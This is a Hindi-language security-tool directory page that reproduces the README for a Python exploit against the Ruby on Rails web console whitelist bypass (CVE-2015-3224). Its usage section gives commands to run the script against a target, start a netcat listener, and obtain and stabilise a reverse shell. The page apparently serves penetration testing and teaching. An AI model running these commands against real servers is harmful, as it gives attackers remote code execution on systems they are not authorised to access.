Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2015-3224 — Ruby on Rails Web Console Exploit (CVE-2015-3224) | Kitploit
उपकरण/GitHubGitHub/sic4rio/cve-2015-3224
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingLearning & EducationRemote Access Tool
GitHubsic4rio/cve-2015-3224

CVE-2015-3224

Ruby on Rails Web Console Exploit (CVE-2015-3224)

रिपॉजिटरी देखें
1 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

Ruby on Rails Web Console Exploit (CVE-2015-3224)

CVE-2015-3224

इस रिपॉजिटरी में एक Python स्क्रिप्ट है जो Ruby on Rails 4.0.x और 4.1.x के डेवलपर वेब कंसोल में IP व्हाइटलिस्ट बायपास भेद्यता का शोषण करती है। यह स्क्रिप्ट कमजोर सर्वरों पर दूरस्थ कोड निष्पादन की अनुमति देती है।

⚠️ अस्वीकरण यह स्क्रिप्ट केवल शैक्षिक उद्देश्यों और अधिकृत सुरक्षा परीक्षण के लिए है। इसे बिना स्पष्ट अनुमति के किसी भी सिस्टम पर उपयोग न करें। लेखक इस स्क्रिप्ट के दुरुपयोग या इसके कारण होने वाली किसी भी क्षति के लिए जिम्मेदार नहीं हैं।


📌 भेद्यता का विवरण

Ruby on Rails के कमजोर संस्करणों में वेब कंसोल विकास उद्देश्यों के लिए है और केवल विश्वसनीय IP पतों से ही सुलभ होना चाहिए। हालांकि, X-Forwarded-For HTTP हेडर के अनुचित हैंडलिंग के कारण, एक हमलावर अपने IP पते को स्पूफ कर सकता है ताकि वह एक विश्वसनीय स्थानीय उपयोगकर्ता (जैसे 127.0.0.1 या ::1) के रूप में दिखाई दे। यह IP व्हाइटलिस्ट को बायपास करता है और वेब कंसोल तक अनधिकृत पहुंच प्रदान करता है, जिससे दूरस्थ कोड निष्पादन होता है।


🚀 विशेषताएं

  • उपयोग में आसान: सरल कमांड-लाइन इंटरफ़ेस।
  • गतिशील पथ खोज: स्वचालित रूप से लक्ष्य की जांच करके गतिशील कंसोल सत्र पथ ढूंढता है।
  • दो शेल मोड:
    • सरल शेल: त्वरित कमांड के लिए एक मूल, गैर-संवादात्मक शेल।
    • रिवर्स TTY शेल: पूरी तरह से संवादात्मक PTY रिवर्स शेल प्राप्त करने के लिए एक-लाइन कमांड।
  • बेहतर पठनीयता: स्थिति संदेशों, सफलताओं और त्रुटियों के लिए रंग-कोडित आउटपुट।
  • मजबूत: नेटवर्क समस्याओं और विफल कमांड के लिए त्रुटि हैंडलिंग शामिल है।

✅ आवश्यकताएं

  • Python 3
  • requests लाइब्रेरी

requests इंस्टॉल करें:

root@kitploit:~
pip install requests

⚙️ उपयोग

  1. रिपॉजिटरी क्लोन करें:

    root@kitploit:~
    git clone https://github.com/Sic4rio/CVE-2015-3224
    cd <repo-directory>
    
  2. स्क्रिप्ट को निष्पादन योग्य बनाएं:

    root@kitploit:~
    chmod +x exploit.py
    

विकल्प 1: सरल इंटरैक्टिव शेल

यह मोड त्वरित, सरल कमांड चलाने के लिए उपयोगी है।

root@kitploit:~
./exploit.py -t http://<TARGET_IP>:<PORT>

विकल्प 2: पूर्ण इंटरैक्टिव TTY (रिवर्स शेल)

यह स्थिर, पूरी तरह से इंटरैक्टिव शेल के लिए अनुशंसित मोड है।

चरण 1: एक लिसनर प्रारंभ करें

अपनी स्थानीय मशीन पर, एक नया टर्मिनल खोलें और netcat लिसनर प्रारंभ करें।

root@kitploit:~
nc -lvnp 9001

चरण 2: एक्सप्लॉइट चलाएं

दूसरे टर्मिनल में, --rev-shell फ्लैग के साथ स्क्रिप्ट चलाएं, अपना स्थानीय IP (lhost) और पोर्ट (lport) प्रदान करें।

root@kitploit:~
./exploit.py -t http://<TARGET_IP>:<PORT> --rev-shell --lhost <YOUR_IP> --lport 9001

चरण 3: शेल को स्थिर करें

आपके netcat लिसनर पर एक कनेक्शन आएगा। इसे पूरी तरह से इंटरैक्टिव TTY में अपग्रेड करने के लिए, netcat विंडो में इन चरणों का पालन करें:

  1. शेल को बैकग्राउंड करें Ctrl+Z दबाकर।
  2. अपने स्थानीय टर्मिनल को रॉ मोड पर सेट करें और शेल को फोरग्राउंड में लाएं।
    root@kitploit:~
    stty raw -echo; fg
    
    यदि प्रॉम्प्ट पुनः प्रकट नहीं होता है तो Enter दबाएं।
  3. रिमोट शेल पर टर्मिनल गुण सेट करें।
    root@kitploit:~
    reset
    export SHELL=bash
    export TERM=xterm-256color
    stty rows 50 cols 120
    

अब आपके पास पूरी तरह कार्यात्मक और स्थिर शेल है!


👥 क्रेडिट्स

  • Original Exploit: Eval (@0xEval)
  • Readme.md फ़ाइल: GPT
टूल डाउनलोड करें